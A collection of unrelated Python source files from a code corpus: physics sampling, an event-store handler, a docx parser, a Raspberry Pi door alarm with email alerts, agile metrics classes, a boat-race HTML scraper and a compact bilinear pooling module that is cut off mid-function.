mean_values = get_mean_pri_tau_pt_means(generator, nominal_param)
for k, v in mean_values.items():
print(f'{k} : {np.mean(v)} +/- {np.std(v)}')
generator.reset()
mean_values = get_mean_pri_tau_pt_means(generator, up_param)
for k, v in mean_values.items():
print(f'{k} : {np.mean(v)} +/- {np.std(v)}')
generator.reset()
mean_values = get_mean_pri_tau_pt_means(generator, down_param)
for k, v in mean_values.items():
print(f'{k} : {np.mean(v)} +/- {np.std(v)}')
def get_mean_pri_tau_pt_means(generator, param):
print(param, *param)
N_SAMPLES = 50
SAMPLE_SIZE = np.arange(10_000, 100_000, 10_000)
pri_tau_pt_idx = 12
print(generator.feature_names[pri_tau_pt_idx])
mean_values = {}
for sample_size in SAMPLE_SIZE:
print(f'processing with {sample_size} events ...')
mean_values[sample_size] = []
for i in range(N_SAMPLES):
X, y, w = generator.generate(*param, n_samples=sample_size, no_grad=True)
pri_tau_pt = X[:, pri_tau_pt_idx]
pri_tau_pt_mean = (pri_tau_pt * w).sum() / w.sum()
mean_values[sample_size].append( pri_tau_pt_mean.detach().numpy() )
return mean_values
if __name__ == '__main__':
main()
| StarcoderdataPython |
3522397 | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" StoreRecordHandler class
This class was call when store consumer receive an new StoreRecord event and store msg in local & global store
"""
from tonga.models.store.base import BaseStoreRecordHandler
from tonga.models.store.store_record import StoreRecord
from tonga.stores.manager.base import BaseStoreManager
from tonga.models.structs.store_record_type import StoreRecordType
from tonga.models.structs.positioning import BasePositioning
# Import StoreRecordHandler exceptions
from tonga.models.store.errors import (UnknownStoreRecordType)
__all__ = [
'StoreRecordHandler'
]
class StoreRecordHandler(BaseStoreRecordHandler):
""" StoreRecordHandler Class
Attributes:
_store_manager (BaseStoreBuilder): Store manager class, used for build & maintain local & global store
"""
_store_manager: BaseStoreManager
def __init__(self, store_manager: BaseStoreManager) -> None:
""" StoreRecordHandler constructor
Args:
store_manager (BaseStoreBuilder): Store manager class, used for build & maintain local & global store
Returns:
None
"""
super().__init__()
self._store_manager = store_manager
@classmethod
def handler_name(cls) -> str:
""" Return store record handler name, used by serializer
Returns:
str: StoreRecordHandler name
"""
return 'tonga.store.record'
async def local_store_handler(self, store_record: StoreRecord, positioning: BasePositioning) -> None:
""" This function is automatically call by Tonga when an BaseStore with same name was receive by consumer.
Used for build local store.
Args:
store_record (BaseStoreRecord): StoreRecord event receive by consumer
positioning (BasePositioning): Contains topic / partition / offset
Raises:
NotImplementedError: Abstract def
Returns:
None
"""
# Set or delete from local store
if store_record.operation_type == StoreRecordType('set'):
await self._store_manager.set_from_local_store_rebuild(store_record.key, store_record.value)
elif store_record.operation_type == StoreRecordType('del'):
await self._store_manager.delete_from_local_store_rebuild(store_record.key)
else:
raise UnknownStoreRecordType
# Update metadata from local store
positioning.set_current_offset(positioning.get_current_offset() + 1)
await self._store_manager.update_metadata_from_local_store(positioning)
async def global_store_handler(self, store_record: StoreRecord, positioning: BasePositioning) -> None:
""" This function is automatically call by Tonga when an BaseStore with same name was receive by consumer.
Used for build global store.
Args:
store_record (BaseStoreRecord): StoreRecord event receive by consumer
positioning (BasePositioning): Contains topic / partition / offset
Raises:
NotImplementedError: Abstract def
Returns:
None
"""
# Set or delete from global store
if store_record.operation_type == StoreRecordType('set'):
await self._store_manager.set_from_global_store(store_record.key, store_record.value)
elif store_record.operation_type == StoreRecordType('del'):
await self._store_manager.delete_from_global_store(store_record.key)
else:
raise UnknownStoreRecordType
# Update metadata from global store
positioning.set_current_offset(positioning.get_current_offset() + 1)
await self._store_manager.update_metadata_from_global_store(positioning)
| StarcoderdataPython |
306219 | __author__ = 'achamseddine'
import os
import csv
import time
import json
def read_docx():
# import sys
# import docx
from docx import Document
path = os.path.dirname(os.path.abspath(__file__))
path2file = path+'/HACT_TDH-it_Arsal_Center_100419.docx'
document = Document(path2file)
for paragraph in document.paragraphs:
p = paragraph._element
# print(p.xml)
checkBoxes = p.xpath('//w:sym')
# print(checkBoxes)
# if checkBoxes:
# print(p.xml)
# break
# for item in checkBoxes:
# print(item.values())
document = Document(path2file)
table = document.tables[1]
# print(document.tables[0].rows[0].cells[0].text)
# print(document.tables[1].rows[0].cells[0].text)
# print(document.tables[1].rows[2].cells[0].text)
# print(document.tables[1].rows[3].cells[0].text)
# print(document.tables[1].rows[4].cells[0].text)
# print(document.tables[1].rows[5].cells[0].text)
# print(document.tables[1].rows[6].cells[0].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[0].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[1].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[2].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[3].text)
#
# print(document.tables[1].rows[6].cells[0].xml)
# print(document.tables[1].rows[6].cells[0].paragraphs[8]._element.xml)
# print(document.tables[1].rows[6].cells[0].paragraphs[8].runs[0].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[8].runs[1].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[8].runs[2].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[8].text)
# print(document.tables[1].rows[6].cells[0]._element.xml)
paragraph = document.tables[1].rows[6].cells[0].paragraphs[7]
print(paragraph.text)
element = paragraph._element
items = element.xpath('.//w:sym')
for item in items:
print(item.values())
paragraph = document.tables[1].rows[6].cells[0].paragraphs[8]
print(paragraph.text)
element = paragraph._element
items = element.xpath('.//w:sym')
for item in items:
print(item.values())
# print(document.tables[1].rows[16].cells[0].paragraphs[0].text)
# print(document.tables[1].rows[17].cells[0].paragraphs[0].text)
# print(document.tables[1].rows[18].cells[0].paragraphs[0].text)
print(document.tables[1].rows[19].cells[0].paragraphs[0].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[4].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[5].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[6].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1].runs[7].text)
# print(document.tables[1].rows[6].cells[0].paragraphs[1]._element.xml)
| StarcoderdataPython |
3451304 | import RPi.GPIO as GPIO
import time
import smtplib
import thread
import cred
import imaplib
import email
import os
from PCF8574 import PCF8574_GPIO
from Adafruit_LCD1602 import Adafruit_CharLCD
try:
need_clean = False
#Message Template
MSG = '\nDoor was '
DOOR_MSG = {True:'opened', False:'closed'}
#function to send message to phone
def send_msg(message):
print('send msg function')
print('initiating server')
server = smtplib.SMTP( cred.SMTPHOST, 587 )
print('starting tls')
server.starttls()
server.login( cred.FROM, cred.PASS )
print('sending message...')
server.sendmail(cred.FROM, cred.TO, message)
print('message sent!')
server.quit()
def read_msg(nothing):
# connect to host using SSL
mail = imaplib.IMAP4_SSL(cred.IMAPHOST,993)
mail.login(cred.FROM, cred.PASS)
mail.select('Inbox')
type, data = mail.search(None, '(FROM "<EMAIL>")')
mail_ids = data[0]
off = 0
stop = 0
for num in data[0].split():
typ, data = mail.fetch(num, '(RFC822)' )
raw_email = data[0][1]# converts byte literal to string removing b''
raw_email_string = raw_email.decode('utf-8')
email_message = email.message_from_string(raw_email_string)# downloading attachments
for part in email_message.walk():
fileName = part.get_filename()
if bool(fileName):
filePath = os.path.join('/home/pi/', fileName)
if not os.path.isfile(filePath) :
fp = open(filePath, 'wb')
fp.write(part.get_payload(decode=True))
fp.close()
f = open(filePath, "r")
text = f.readline()
f.close()
os.remove(filePath)
text = text.replace(".", "")
text = text.replace(" ", "")
text = text.lower()
if text == 'off':
off = 1
elif text == 'stop':
stop = 1
else:
print('Not stopped')
send_msg("\nError: please type 'Stop'")
mail.store(num, '+FLAGS', '\\Deleted') #deletes recent email
#cleans email trash
mail.expunge()
mail.close()
if off == 1:
GPIO.output(buzz,GPIO.LOW)
print('Sucessfully Restarted')
lcd.setCursor(0,0)
lcd.message('Alarm was restarted')
send_msg("\nAlarm restarted")
if stop == 1:
GPIO.output(buzz,GPIO.LOW)
print('Successfully stopped')
send_msg("\nAlarm Deactivated")
lcd.clear()
os._exit(0)
def while_read(nothing):
while True:
time.sleep(10)
thread.start_new_thread(read_msg,("",))
#Initializing GPIO
print('Setting up hardware...')
PIN = 36
buzz = 38
GPIO.setmode(GPIO.BOARD)
GPIO.setup(PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(buzz, GPIO.OUT)
#next_state to check for to send message
next_state = True
need_clean = True
PCF8574_address = 0x27 # I2C address of the PCF8574 chip.
PCF8574A_address = 0x3F # I2C address of the PCF8574A chip.
# Create PCF8574 GPIO adapter.
try:
mcp = PCF8574_GPIO(PCF8574_address)
except:
try:
mcp = PCF8574_GPIO(PCF8574A_address)
except:
print ('I2C Address Error !')
exit(1)
# Create LCD, passing in MCP GPIO adapter.
lcd = Adafruit_CharLCD(pin_rs=0, pin_e=2, pins_db=[4,5,6,7], GPIO=mcp)
#Running actual program
print('Ready!')
mcp.output(3,1) # turn on LCD backlight
lcd.begin(16,2) # set number of LCD lines and columns
thread.start_new_thread(send_msg, ("\nAlarm Activated\n\nType 'stop' to stop deactivate it",))
off = 0
#Run infinitely
thread.start_new_thread(while_read,("",))
while True:
#Check for next state
if GPIO.input(PIN) == next_state:
doorTime = time.strftime('%I:%M:%S %p')
message = "Door was " + DOOR_MSG[next_state] + "\n\nType 'off' to restart alarm"
lcd.setCursor(0,0)
lcd.message(message + '\n at ' + doorTime)
print(message)
GPIO.output(buzz,GPIO.HIGH)
#Send message on different thread
thread.start_new_thread(send_msg, ("\n" + message,))
#Negate next_state
next_state = not next_state
time.sleep(0.3)
except KeyboardInterrupt:
print('KeyboardInterrupt')
GPIO.output(buzz,GPIO.LOW)
GPIO.cleanup()
lcd.clear()
need_clean = False
#cleans up necessary hardware
if need_clean:
lcd.clear()
GPIO.cleanup() #For normal exit
print('\nEnd!')
| StarcoderdataPython |
11329454 | from django.core.management.base import BaseCommand
from ...data_integrity_checks import ObservationDataChecks
class Command(BaseCommand):
help = 'Check observation data.'
def add_arguments(self, parser):
pass
def handle(self, *args, **options):
observation_checks = ObservationDataChecks()
print("***** Observations without a suborder *****")
# print(len(observation_checks.find_observations_without_suborder()), "results:\n")
for observation in observation_checks.find_observations_without_suborder():
print(observation)
| StarcoderdataPython |
9734532 | <filename>test5.py
#!/usr/bin/env python
#some _string
~
#
| StarcoderdataPython |
3257427 | <reponame>leonell147/oci-swarm-cluster
import abc
import datetime
from typing import Dict, Any
from actions.procesamiento.tarea import Tarea
from actions.procesamiento.fase import Fase
class CalculationStrategy(metaclass=abc.ABCMeta):
"""Interfaz que define el comportamiento basico requerido por una estrategia
usada en el calculo de metricas.
Autor: <NAME>.
"""
@abc.abstractmethod
def process_event(self, event: Dict) -> None:
"""Procesa el evento.
Autor: Bruno.
:param event: evento a procesar.
:return: None.
"""
raise NotImplementedError
@abc.abstractmethod
def calculate_value(self) -> Any:
"""Calcula el valor de la estrategia.
Autor: Bruno.
:return: Any.
"""
raise NotImplementedError
@abc.abstractmethod
def get_name(self) -> str:
"""Calcula el valor de la estrategia.
Autor: <NAME>.
:return: Any.
"""
raise NotImplementedError
class MeetingParticipations(CalculationStrategy):
"""Cuenta las participaciones de todos los TeamMembers/AgileBots que forman
parte de un proyecto en AgileTalk.
Autor: <NAME>.
"""
def __init__(self): # Componente.getReuniones()
"""Constructor.
Args:
"""
self._n_occurrences = 0
self._d_ocurrences = {}
self.result=""
def __str__(self) -> str:
return "(MeetingParticipations: {})".format(self._n_occurrences)
def get_name(self) -> str:
return "MeetingParticipations"
def process_event(self, event: Dict) -> None:
"""A partir de un evento cuenta las participaciones generales por
persona.
Autor: <NAME>.
:param event: evento a procesar. El formato del evento es:
{'Participations': [{'1': {'cant_particip': '3'}},
{'2': {'cant_particip': '2'}}, {'3': {'cant_particip': '3'}}]}
:return: None.
"""
self.result=""
participations = event["Participations"]
for x in participations:
for key, value in x.items():
self.result=self.result+"El miembro del equipo "+str(key)+" participó "+str(value["cant_particip"])+" veces en la reunión. "
def calculate_value(self) -> str:
"""Devuelve todas las participaciones en reuniones dentro de un
proyecto.
Autor: <NAME>.
:return: Str.
"""
return self.result
class MeetAsistance(CalculationStrategy):
"""Calcula el porcentaje de asistencia a una reunion.
Autor: <NAME>.
"""
def __init__(self): # Componente.getReuniones()
self._n_asistance = 0
def __str__(self) -> str:
return "(MeetAsistance: {})".format(self._n_asistance)
def get_name(self) -> str:
return "MeetAsistance"
def process_event(self, event: Dict) -> None:
"""Establece el porcentaje de TeamMembers/AgileBots que participaron en
la reunion.
Autor: <NAME>.
:param event: evento a procesar. El formato del evento es:
{"event_id": "", "time": "", "id_reunion": "",
"participaciones": {"bruno": 5, "matias": 7}}
:return: None.
"""
# TODO Se requiere que todos los TeamMembers/AgileBots que tengan que
# participar en la reunion aparezcan en event["participaciones"],
# aunque sea con un valor de cero participaciones.
reunion = event["participaciones"]
total_asistance = 0
for meet_user, ocurrence in reunion.items():
if ocurrence > 0:
total_asistance += 1
cant = len(reunion)
if cant > 0:
self._n_asistance = total_asistance / cant
def calculate_value(self) -> float:
"""Devuelve el porcentaje de asistencia a la reunion.
Autor: <NAME>.
:return: Dict.
"""
return self._n_asistance
class EstimatedDeadline(CalculationStrategy):
"""Calcula el porcentaje de asistencia a una reunion.
Autor: <NAME>.
"""
def __init__(self): # Componente getFase
"""Constructor.
Args:
"""
# La fase self.meet debería ser provista por un componente que brinde
# el artefacto
self.fecha_init= datetime.datetime.utcnow()
self.fecha_fin= datetime.datetime.utcnow() + datetime.timedelta(minutes=15)
self._fase = Fase(1, self.fecha_init.strftime("%Y-%m-%d %H:%M:%S"), self.fecha_fin.strftime("%Y-%m-%d %H:%M:%S"))
self._fase.add_actor("actor1")
self._fase.add_actor("actor1")
self._fase.add_actor("actor1")
self._estimated_time = datetime.date.today()
self._real_time = datetime.date.today()
def __str__(self) -> str:
return " "
def get_name(self) -> str:
return "EstimatedDeadline"
def process_event(self, event: dict) -> None:
"""Compara el plazo de finalización estimado de una fase con su
finalizacion real.
Autor: <NAME>.
:param event: evento "FinFase" a procesar.
:return: None.
"""
d={"id":1,"fecha_start":"fecha","fecha_ended":"fecha"}
date_format = "%Y-%m-%d %H:%M:%S"
self._fase.set_id(event["id"])
self._fase.finalizar()
#real_end_date=self._fase.get_fecha_fin()
end_date = datetime.datetime.strptime(
str(self._fase.get_duracion_estimada()), date_format)
start_date = datetime.datetime.strptime(
str(self._fase.get_fecha_inicio()), date_format)
real_end_date=datetime.datetime.strptime(
str(event["fecha_ended"]), date_format)
real_start_date=datetime.datetime.strptime(
str(event["fecha_start"]), date_format)
self._estimated_time = end_date - start_date
self._real_time = real_end_date - real_start_date
def calculate_value(self) -> int:
"""Retorna la cantidad de segundos existentes entre el plazo estimado
y el plazo real de finalizacion.
Si la cantidad es negativa -> realTime < estimatedTime
Si la cantidad es positiva -> realTime > estimatedTime
Autor: <NAME>.
:return: int.
"""
self._real_time = self._real_time.total_seconds()
self._estimated_time = self._estimated_time.total_seconds()
difference_sec = self._real_time - self._estimated_time
return difference_sec
class ControlTask(CalculationStrategy):
"""Calcula el porcentaje de asistencia a una reunion.
Autor: <NAME>.
"""
def __init__(self): # Componente.getReuniones()
self._n_asistance = 0
self.tareas=[]
self.result={}
self.valor=""
self.horashechas=0
def __str__(self) -> str:
return "(ControlTask: {})".format(self._n_asistance)
def get_name(self) -> str:
return "ControlTask"
def process_event(self, event: dict) -> None:
#d={"tareas":[{"id": 1, "horas":5},{"id":2, "horas":5}]}
print(event)
self.valor=""
self.horashechas=0
list_tareas=event["Tareas"]
for x in list_tareas:
for key, value in x.items():
horas=int(value["horas_totales"]) - int(value["horas_trabajadas"])
self.valor=self.valor+"La tarea "+ str(key)+ " necesita "+str(horas)+" hora/s más para ser finalizada. "
#t = Tarea(x["id"],"desc",datetime.datetime.today(),datetime.datetime.today(),"agile","asd","in progress",10)
#self.tareas.append(t)
#self.result["id"]=t.get_puntos_restantes(x["horas"])
self.horashechas=self.horashechas+int(value["horas_trabajadas"])
def calculate_value(self) -> str:
resultado=self.valor+" El miembro del equipo trabajó "+str(self.horashechas)+" horas diarias."
#for x in range(0,len(self.tareas)):
return resultado | StarcoderdataPython |
5012388 | import pytest
from ferret.extractors.content_extractor import ContentExtractor
def _get_contents_of(file_path):
try:
with open(file_path) as file:
return file.read()
except IOError:
return None
@pytest.mark.parametrize("language,website_acronym", [
("pt", "r7"),
("pt", "terra"),
])
def test_content_extractor(language, website_acronym):
html_file_path = "tests/resources/{}/{}/page.html".format(language, website_acronym)
html = _get_contents_of(html_file_path)
expected_content_file_path = "tests/resources/{}/{}/content.html".format(language, website_acronym)
expected_content = _get_contents_of(expected_content_file_path)
extractor = ContentExtractor(html)
extracted_content = extractor.extract()
print(extracted_content)
assert extracted_content == expected_content
| StarcoderdataPython |
9733007 | '''
【システム】BOAT_RACE_DB2
【ファイル】140_mkcsv_t_info_h.py
【機能仕様】直前情報HTMLファイルからレース情報タイトルテーブル「t_info_h」のインポートCSVファイルを作成する
【動作環境】macOS 11.1/Raspbian OS 10.4/python 3.9.1/sqlite3 3.32.3
【来 歴】2021.02.01 ver 1.00
'''
import os
import datetime
from bs4 import BeautifulSoup
#インストールディレクトの定義
BASE_DIR = '/home/pi/BOAT_RACE_DB'
'''
【関 数】mkcsv_t_info_h
【機 能】直前HTMLファイルから直前情報ヘッダテーブル「t_info_h」のインポートCSVファイルを作成する
【引 数】なし
【戻り値】なし
'''
def mkcsv_t_info_h():
print('直前情報ヘッダテーブル「t_info_h」のインポートCSVファイル 開始')
in_path = BASE_DIR + '/200_html/last_info'
out_file = BASE_DIR + '/210_csv/t_info_h.csv'
fw = open(out_file, 'w')
for item in os.listdir(path=in_path):
if item != '.html' and item != '.DS_Store':
in_file = in_path + '/' + item
print("==> 処理中[%s]" % (in_file))
fb = open(in_file, 'r')
html = fb.read()
fb.close()
#データ存在チェック
flg = 0
if 'データがありません。' in html:
flg = 1
if flg == 0:
#CSVレコードフィールドの初期化(共通項目)
t_info_h_yyyymmdd = '' #開催日付
t_info_h_pool_code = '' #場コード
t_info_h_race_no = '' #レース番号
t_info_h_temperature = '' #気温
t_info_h_weather = '' #天候区分
t_info_h_wind_speed = '' #風速
t_info_h_water_temperature = '' #水温
t_info_h_wave_height = '' #波高
t_info_h_wind = '' #風向区分
#HTMLファイルからcsvレコード項目を抽出
soup = BeautifulSoup(html, 'html.parser')
#開催日付の抽出
t_info_h_yyyymmdd = item[0:8]
#場コードの抽出
t_info_h_pool_code = item[8:10]
#レース番号
t_info_h_race_no = item[10:12]
#気温の抽出
n = 0
for tag1 in soup.find_all('span'):
if 'weather1_bodyUnitLabelData' in str(tag1):
n = n + 1
if n == 1:
wk_arry = str(tag1).split('>')
t_info_h_temperature = str(wk_arry[1])
t_info_h_temperature = t_info_h_temperature.replace('</span','')
t_info_h_temperature = t_info_h_temperature.replace('℃','')
#天候区分の抽出
n = 0
for tag1 in soup.find_all('span'):
if 'weather1_bodyUnitLabelTitle' in str(tag1):
n = n + 1
if n == 2:
wk_arry = str(tag1).split('>')
t_info_h_weather = str(wk_arry[1])
t_info_h_weather = t_info_h_weather.replace('</span','')
break
#風速の抽出
n = 0
for tag1 in soup.find_all('span'):
if 'weather1_bodyUnitLabelData' in str(tag1):
n = n + 1
if n == 2:
wk_arry = str(tag1).split('>')
t_info_h_wind_speed = str(wk_arry[1])
t_info_h_wind_speed = t_info_h_wind_speed.replace('</span','')
t_info_h_wind_speed = t_info_h_wind_speed.replace('m','')
break
#水温の抽出
n = 0
for tag1 in soup.find_all('span'):
if 'weather1_bodyUnitLabelData' in str(tag1):
n = n + 1
if n == 3:
wk_arry = str(tag1).split('>')
t_info_h_water_temperature = str(wk_arry[1])
t_info_h_water_temperature = t_info_h_water_temperature.replace('</span','')
t_info_h_water_temperature = t_info_h_water_temperature.replace('℃','')
break
#波高の抽出
n = 0
for tag1 in soup.find_all('span'):
if 'weather1_bodyUnitLabelData' in str(tag1):
n = n + 1
if n == 4:
wk_arry = str(tag1).split('>')
t_info_h_wave_height = str(wk_arry[1])
t_info_h_wave_height = t_info_h_wave_height.replace('</span','')
t_info_h_wave_height = t_info_h_wave_height.replace('cm','')
break
#風向区分の抽出
t_info_h_wind = '不明'
for tag1 in soup.find_all('p'):
if 'weather1_bodyUnitImage is-wind' in str(tag1):
if '"weather1_bodyUnitImage is-wind1"' in str(tag1):
t_info_h_wind = '左直'
break
if '"weather1_bodyUnitImage is-wind2"' in str(tag1):
t_info_h_wind = '追左'
break
if '"weather1_bodyUnitImage is-wind3"' in str(tag1):
t_info_h_wind = '追左'
break
if '"weather1_bodyUnitImage is-wind4"' in str(tag1):
t_info_h_wind = '追左'
break
if '"weather1_bodyUnitImage is-wind5"' in str(tag1):
t_info_h_wind = '追直'
break
if '"weather1_bodyUnitImage is-wind6"' in str(tag1):
t_info_h_wind = '追右'
break
if '"weather1_bodyUnitImage is-wind7"' in str(tag1):
t_info_h_wind = '追右'
break
if '"weather1_bodyUnitImage is-wind8"' in str(tag1):
t_info_h_wind = '追右'
break
if '"weather1_bodyUnitImage is-wind9"' in str(tag1):
t_info_h_wind = '右直'
break
if '"weather1_bodyUnitImage is-wind10"' in str(tag1):
t_info_h_wind = '向左'
break
if '"weather1_bodyUnitImage is-wind11"' in str(tag1):
t_info_h_wind = '向左'
break
if '"weather1_bodyUnitImage is-wind12"' in str(tag1):
t_info_h_wind = '向左'
break
if '"weather1_bodyUnitImage is-wind13"' in str(tag1):
t_info_h_wind = '向直'
break
if '"weather1_bodyUnitImage is-wind14"' in str(tag1):
t_info_h_wind = '無風'
break
if '"weather1_bodyUnitImage is-wind15"' in str(tag1):
t_info_h_wind = '向右'
break
if '"weather1_bodyUnitImage is-wind16"' in str(tag1):
t_info_h_wind = '向右'
break
if '"weather1_bodyUnitImage is-wind17"' in str(tag1):
t_info_h_wind = '無風'
break
#レコードの組み立て
t_info_h_outrec = ''
t_info_h_outrec = t_info_h_outrec + '"' + t_info_h_yyyymmdd + '"' #開催日付
t_info_h_outrec = t_info_h_outrec + ',"' + t_info_h_pool_code + '"' #場コード
t_info_h_outrec = t_info_h_outrec + ',"' + t_info_h_race_no + '"' #レース番号
t_info_h_outrec = t_info_h_outrec + ',' + t_info_h_temperature #気温
t_info_h_outrec = t_info_h_outrec + ',"' + t_info_h_weather + '"' #天候区分
t_info_h_outrec = t_info_h_outrec + ',' + t_info_h_wind_speed #風速
t_info_h_outrec = t_info_h_outrec + ',' + t_info_h_water_temperature #水温
t_info_h_outrec = t_info_h_outrec + ',' + t_info_h_wave_height #波高
t_info_h_outrec = t_info_h_outrec + ',"' + t_info_h_wind + '"' #風向区分
#CSVレコードファイル出力
fw.write(t_info_h_outrec + '\n')
fw.close()
print('直前情報ヘッダーテーブル「t_info_h」のインポートCSVファイル 完了')
#主処理
mkcsv_t_info_h() #直前情報ヘッダーテーブル「t_info_h」のインポートCSVファイルを作成
| StarcoderdataPython |
1883950 | <reponame>lizhongguo/pytorch-b3d<filename>CompactBilinearPoolingFourStream.py<gh_stars>1-10
import types
import torch
import torch.nn as nn
from torch.autograd import Function
def CountSketchFn_forward(h, s, output_size, x, force_cpu_scatter_add=False):
x_size = tuple(x.size())
s_view = (1,) * (len(x_size)-1) + (x_size[-1],)
out_size = x_size[:-1] + (output_size,)
# Broadcast s and compute x * s
s = s.view(s_view)
xs = x * s
# Broadcast h then compute h:
# out[h_i] += x_i * s_i
h = h.view(s_view).expand(x_size)
if force_cpu_scatter_add:
out = x.new(*out_size).zero_().cpu()
return out.scatter_add_(-1, h.cpu(), xs.cpu()).cuda()
else:
out = x.new(*out_size).zero_()
return out.scatter_add_(-1, h, xs)
def CountSketchFn_backward(h, s, x_size, grad_output):
s_view = (1,) * (len(x_size)-1) + (x_size[-1],)
s = s.view(s_view)
h = h.view(s_view).expand(x_size)
grad_x = grad_output.gather(-1, h)
grad_x = grad_x * s
return grad_x
class CountSketchFn(Function):
@staticmethod
def forward(ctx, h, s, output_size, x, force_cpu_scatter_add=False):
x_size = tuple(x.size())
ctx.save_for_backward(h, s)
ctx.x_size = tuple(x.size())
return CountSketchFn_forward(h, s, output_size, x, force_cpu_scatter_add)
@staticmethod
def backward(ctx, grad_output):
h, s = ctx.saved_variables
grad_x = CountSketchFn_backward(h, s, ctx.x_size, grad_output)
return None, None, None, grad_x
class CountSketch(nn.Module):
r"""Compute the count sketch over an input signal.
.. math::
out_j = \sum_{i : j = h_i} s_i x_i
Args:
input_size (int): Number of channels in the input array
output_size (int): Number of channels in the output sketch
h (array, optional): Optional array of size input_size of indices in the range [0,output_size]
s (array, optional): Optional array of size input_size of -1 and 1.
.. note::
If h and s are None, they will be automatically be generated using LongTensor.random_.
Shape:
- Input: (...,input_size)
- Output: (...,output_size)
References:
<NAME> et al. "Compact Bilinear Pooling" in Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (2016).
<NAME> et al. "Multimodal Compact Bilinear Pooling for Visual Question Answering and Visual Grounding", arXiv:1606.01847 (2016).
"""
def __init__(self, input_size, output_size, h=None, s=None):
super(CountSketch, self).__init__()
self.input_size = input_size
self.output_size = output_size
if h is None:
h = torch.LongTensor(input_size).random_(0, output_size)
if s is None:
s = 2 * torch.Tensor(input_size).random_(0, 2) - 1
# The Variable h being a list of indices,
# If the type of this module is changed (e.g. float to double),
# the variable h should remain a LongTensor
# therefore we force float() and double() to be no-ops on the variable h.
def identity(self):
return self
h.float = types.MethodType(identity, h)
h.double = types.MethodType(identity, h)
self.register_buffer('h', h)
self.register_buffer('s', s)
def forward(self, x):
x_size = list(x.size())
assert(x_size[-1] == self.input_size)
return CountSketchFn.apply(self.h, self.s, self.output_size, x)
def ComplexMultiply_forward(X_re, X_im, Y_re, Y_im):
Z_re = torch.addcmul(X_re*Y_re, -1, X_im, Y_im)
Z_im = torch.addcmul(X_re*Y_im, 1, X_im, Y_re)
return Z_re, Z_im
def ComplexMultiply_backward(X_re, X_im, Y_re, Y_im, grad_Z_re, grad_Z_im):
grad_X_re = torch.addcmul(grad_Z_re * Y_re, 1, grad_Z_im, Y_im)
grad_X_im = torch.addcmul(grad_Z_im * Y_re, -1, grad_Z_re, Y_im)
grad_Y_re = torch.addcmul(grad_Z_re * X_re, 1, grad_Z_im, X_im)
grad_Y_im = torch.addcmul(grad_Z_im * X_re, -1, grad_Z_re, X_im)
return grad_X_re, grad_X_im, grad_Y_re, grad_Y_im
def ComplexMultiplyFourStream_forward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im):
X_re, X_im = ComplexMultiply_forward(A_re, A_im, B_re, B_im)
Y_re, Y_im = ComplexMultiply_forward(C_re, C_im, D_re, D_im)
Z_re, Z_im = ComplexMultiply_forward(X_re, X_im, Y_re, Y_im)
return Z_re, Z_im
def ComplexMultiplyFourStream_backward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im, grad_Z_re, grad_Z_im):
X_re, X_im = ComplexMultiply_forward(A_re, A_im, B_re, B_im)
Y_re, Y_im = ComplexMultiply_forward(C_re, C_im, D_re, D_im)
grad_X_re, grad_X_im, grad_Y_re, grad_Y_im = ComplexMultiply_backward(
X_re, X_im, Y_re, Y_im, grad_Z_re, grad_Z_im)
grad_A_re, grad_A_im, grad_B_re, grad_B_im = ComplexMultiply_backward(
A_re, A_im, B_re, B_im, grad_X_re, grad_X_im)
grad_C_re, grad_C_im, grad_D_re, grad_D_im = ComplexMultiply_backward(
C_re, C_im, D_re, D_im, grad_Y_re, grad_Y_im)
return grad_A_re, grad_A_im, grad_B_re, grad_B_im, grad_C_re, grad_C_im, grad_D_re, grad_D_im
class ComplexMultiply(torch.autograd.Function):
@staticmethod
def forward(ctx, X_re, X_im, Y_re, Y_im):
ctx.save_for_backward(X_re, X_im, Y_re, Y_im)
return ComplexMultiply_forward(X_re, X_im, Y_re, Y_im)
@staticmethod
def backward(ctx, grad_Z_re, grad_Z_im):
X_re, X_im, Y_re, Y_im = ctx.saved_tensors
return ComplexMultiply_backward(X_re, X_im, Y_re, Y_im, grad_Z_re, grad_Z_im)
class ComplexMultiplyFourStream(torch.autograd.Function):
@staticmethod
def forward(ctx, A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im):
ctx.save_for_backward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im)
return ComplexMultiplyFourStream_forward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im)
@staticmethod
def backward(ctx, grad_Z_re, grad_Z_im):
A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im = ctx.saved_tensors
return ComplexMultiplyFourStream_backward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im, grad_Z_re, grad_Z_im)
class CompactBilinearPoolingFn(Function):
@staticmethod
def forward(ctx, h1, s1, h2, s2, output_size, x, y, force_cpu_scatter_add=False):
ctx.save_for_backward(h1, s1, h2, s2, x, y)
ctx.x_size = tuple(x.size())
ctx.y_size = tuple(y.size())
ctx.force_cpu_scatter_add = force_cpu_scatter_add
ctx.output_size = output_size
# Compute the count sketch of each input
px = CountSketchFn_forward(
h1, s1, output_size, x, force_cpu_scatter_add)
fx = torch.rfft(px, 1)
re_fx = fx.select(-1, 0)
im_fx = fx.select(-1, 1)
del px
py = CountSketchFn_forward(
h2, s2, output_size, y, force_cpu_scatter_add)
fy = torch.rfft(py, 1)
re_fy = fy.select(-1, 0)
im_fy = fy.select(-1, 1)
del py
# Convolution of the two sketch using an FFT.
# Compute the FFT of each sketch
# Complex multiplication
re_prod, im_prod = ComplexMultiply_forward(re_fx, im_fx, re_fy, im_fy)
# Back to real domain
# The imaginary part should be zero's
re = torch.irfft(torch.stack((re_prod, im_prod),
